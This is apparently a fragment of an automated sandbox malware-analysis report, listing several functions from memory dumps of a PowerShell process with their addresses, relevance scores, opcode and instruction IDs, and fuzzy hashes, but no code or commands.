                                                                                                      • Instruction ID: ecac3dd170f29582ceddfb07f42817f7d649a49b81551558468de07d7c0e3041
                                                                                                      • Opcode Fuzzy Hash: 91d75b850336cd8240c312ca414fcd158082a1b72f2e3aacdb53f872be008e9f
                                                                                                      • Instruction Fuzzy Hash: C331B831A2965E8FFBB4AB14CC0ABFA72A1FF49755F400539D40D8A1D2CA786985CE11
                                                                                                      Function 00007FF8758E5054 Relevance: .1, Instructions: 87COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1011131407.00007FF8758E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8758E0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff8758e0000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: f1d86c659963c96be9ae923ae758ce93294b7c3a3d32c1d3dde137ba7aee8218
                                                                                                      • Instruction ID: a24b4d6385c8dec8780972f303e07a4bda497b4830aa19a77b9b4906461f167b
                                                                                                      • Opcode Fuzzy Hash: f1d86c659963c96be9ae923ae758ce93294b7c3a3d32c1d3dde137ba7aee8218
                                                                                                      • Instruction Fuzzy Hash: 3221F73161CB494FD74ADF18D491ABEB7E0FF95350F10057EE08AC75A6DA36A882CB41
                                                                                                      Function 00007FF875BA2F0C Relevance: .0, Instructions: 40COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1014858553.00007FF875BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF875BA0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff875ba0000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: af826fb48f05eb1ed43c0fe38d2a5a4c1e5db0d07728120de2ab75ba56215507
                                                                                                      • Instruction ID: 0c7a734dccc6964ae071875d43b84c2a62c31929ebddb5f88313b7e1195a4957
                                                                                                      • Opcode Fuzzy Hash: af826fb48f05eb1ed43c0fe38d2a5a4c1e5db0d07728120de2ab75ba56215507
                                                                                                      • Instruction Fuzzy Hash: 6BF06D32A1C9058FDB58EA0CE8419A8B3E0EF05760B1500F7E10DCB1A7DA26AC498B40
                                                                                                      Function 00007FF8758F2B30 Relevance: .0, Instructions: 34COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1011131407.00007FF8758E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8758E0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff8758e0000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 2d773caa93bc4ee89f074938145e98a4ab2e0aea31ad7bd11ac94e8fb79f83f4
                                                                                                      • Instruction ID: c2ff9837e08a5a529819db81422b02024f7927c81fb654ce6df0fcd3a8273f65
                                                                                                      • Opcode Fuzzy Hash: 2d773caa93bc4ee89f074938145e98a4ab2e0aea31ad7bd11ac94e8fb79f83f4
                                                                                                      • Instruction Fuzzy Hash: D3F02B314086C98FDB06DF2488455D5BFA0EF26250B0403C7D458C70A2CB759458CBD2